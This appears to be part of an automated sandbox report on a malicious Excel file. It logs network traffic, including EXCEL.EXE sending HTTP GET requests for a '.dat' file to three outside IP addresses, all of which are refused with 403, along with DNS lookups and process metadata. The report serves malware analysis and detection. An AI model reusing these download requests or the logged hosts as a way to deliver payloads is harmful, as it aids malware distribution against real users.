                                                                                                                                                May 4, 2021 18:18:30.201510906 CEST804971091.211.91.81192.168.2.5
                                                                                                                                                May 4, 2021 18:18:30.201611042 CEST4971080192.168.2.591.211.91.81
                                                                                                                                                May 4, 2021 18:18:30.202322006 CEST4971080192.168.2.591.211.91.81
                                                                                                                                                May 4, 2021 18:18:30.286004066 CEST804971091.211.91.81192.168.2.5
                                                                                                                                                May 4, 2021 18:18:30.353199005 CEST804971091.211.91.81192.168.2.5
                                                                                                                                                May 4, 2021 18:18:30.353379011 CEST4971080192.168.2.591.211.91.81
                                                                                                                                                May 4, 2021 18:18:30.359532118 CEST4971180192.168.2.55.34.179.36
                                                                                                                                                May 4, 2021 18:18:30.506668091 CEST80497115.34.179.36192.168.2.5
                                                                                                                                                May 4, 2021 18:18:30.506772041 CEST4971180192.168.2.55.34.179.36
                                                                                                                                                May 4, 2021 18:18:30.507437944 CEST4971180192.168.2.55.34.179.36
                                                                                                                                                May 4, 2021 18:18:30.652296066 CEST80497115.34.179.36192.168.2.5
                                                                                                                                                May 4, 2021 18:18:31.058928013 CEST80497115.34.179.36192.168.2.5
                                                                                                                                                May 4, 2021 18:18:31.059113979 CEST4971180192.168.2.55.34.179.36
                                                                                                                                                May 4, 2021 18:18:31.512852907 CEST4971280192.168.2.545.153.229.23
                                                                                                                                                May 4, 2021 18:18:31.578047991 CEST804971245.153.229.23192.168.2.5
                                                                                                                                                May 4, 2021 18:18:31.578244925 CEST4971280192.168.2.545.153.229.23
                                                                                                                                                May 4, 2021 18:18:31.583070040 CEST4971280192.168.2.545.153.229.23
                                                                                                                                                May 4, 2021 18:18:31.647933960 CEST804971245.153.229.23192.168.2.5
                                                                                                                                                May 4, 2021 18:18:31.703550100 CEST804971245.153.229.23192.168.2.5
                                                                                                                                                May 4, 2021 18:18:31.703784943 CEST4971280192.168.2.545.153.229.23
                                                                                                                                                May 4, 2021 18:19:35.353192091 CEST804971091.211.91.81192.168.2.5
                                                                                                                                                May 4, 2021 18:19:35.353251934 CEST4971080192.168.2.591.211.91.81
                                                                                                                                                May 4, 2021 18:19:36.056477070 CEST80497115.34.179.36192.168.2.5
                                                                                                                                                May 4, 2021 18:19:36.056592941 CEST4971180192.168.2.55.34.179.36
                                                                                                                                                May 4, 2021 18:19:36.702625036 CEST804971245.153.229.23192.168.2.5
                                                                                                                                                May 4, 2021 18:19:36.702742100 CEST4971280192.168.2.545.153.229.23
                                                                                                                                                May 4, 2021 18:20:10.936978102 CEST4971280192.168.2.545.153.229.23
                                                                                                                                                May 4, 2021 18:20:10.937933922 CEST4971180192.168.2.55.34.179.36
                                                                                                                                                May 4, 2021 18:20:10.939465046 CEST4971080192.168.2.591.211.91.81
                                                                                                                                                May 4, 2021 18:20:11.002485991 CEST804971245.153.229.23192.168.2.5
                                                                                                                                                May 4, 2021 18:20:11.023432970 CEST804971091.211.91.81192.168.2.5
                                                                                                                                                May 4, 2021 18:20:11.082885027 CEST80497115.34.179.36192.168.2.5

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                May 4, 2021 18:18:07.786973000 CEST53653078.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:18:08.609707117 CEST6434453192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:18:08.655838966 CEST6206053192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:18:08.666712046 CEST53643448.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:18:08.706659079 CEST53620608.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:18:08.841675997 CEST6180553192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:18:08.899843931 CEST53618058.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:18:09.643723011 CEST5479553192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:18:09.692467928 CEST53547958.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:18:11.431610107 CEST4955753192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:18:11.480973959 CEST53495578.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:18:11.987588882 CEST6173353192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:18:12.041505098 CEST53617338.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:18:12.531738043 CEST6544753192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:18:12.585551977 CEST53654478.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:18:13.502540112 CEST5244153192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:18:13.554553032 CEST53524418.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:18:14.342191935 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:18:14.393733978 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:18:19.579346895 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:18:19.628041029 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:18:20.502357006 CEST6529653192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:18:20.554048061 CEST53652968.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:18:20.971335888 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:18:21.054374933 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:18:21.523596048 CEST6015153192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:18:21.604015112 CEST53601518.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:18:22.536772013 CEST6015153192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:18:22.585417986 CEST53601518.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:18:23.536621094 CEST6015153192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:18:23.594793081 CEST53601518.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:18:25.315774918 CEST5696953192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:18:25.370491982 CEST53569698.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:18:25.556772947 CEST6015153192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:18:25.635109901 CEST53601518.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:18:27.547667027 CEST5516153192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:18:27.596299887 CEST53551618.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:18:29.568588018 CEST6015153192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:18:29.625710964 CEST53601518.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:18:37.324697018 CEST5475753192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:18:37.419667006 CEST53547578.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:18:46.608212948 CEST4999253192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:18:46.656831980 CEST53499928.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:19:01.440752029 CEST6007553192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:19:01.502223015 CEST53600758.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:19:32.603543043 CEST5501653192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:19:32.652379990 CEST53550168.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:19:38.455166101 CEST6434553192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:19:38.516515017 CEST53643458.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:19:54.134036064 CEST5712853192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:19:54.208677053 CEST53571288.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:20:16.957983971 CEST5479153192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:20:17.006778002 CEST53547918.8.8.8192.168.2.5
                                                                                                                                                May 4, 2021 18:20:19.371716022 CEST5046353192.168.2.58.8.8.8
                                                                                                                                                May 4, 2021 18:20:19.432132959 CEST53504638.8.8.8192.168.2.5

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • 91.211.91.81
                                                                                                                                                • 5.34.179.36
                                                                                                                                                • 45.153.229.23

                                                                                                                                                HTTP Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                0192.168.2.54971091.211.91.8180C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                May 4, 2021 18:18:30.202322006 CEST826OUTGET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 91.211.91.81
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                May 4, 2021 18:18:30.353199005 CEST827INHTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Tue, 04 May 2021 16:18:30 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                1192.168.2.5497115.34.179.3680C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                May 4, 2021 18:18:30.507437944 CEST827OUTGET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 5.34.179.36
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                May 4, 2021 18:18:31.058928013 CEST828INHTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Tue, 04 May 2021 16:18:30 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                2192.168.2.54971245.153.229.2380C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                May 4, 2021 18:18:31.583070040 CEST829OUTGET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 45.153.229.23
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                May 4, 2021 18:18:31.703550100 CEST829INHTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Tue, 04 May 2021 16:18:31 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Start time:18:18:20
                                                                                                                                                Start date:04/05/2021
                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                Imagebase:0x220000
                                                                                                                                                File size:27110184 bytes
                                                                                                                                                MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Disassembly

                                                                                                                                                Reset < >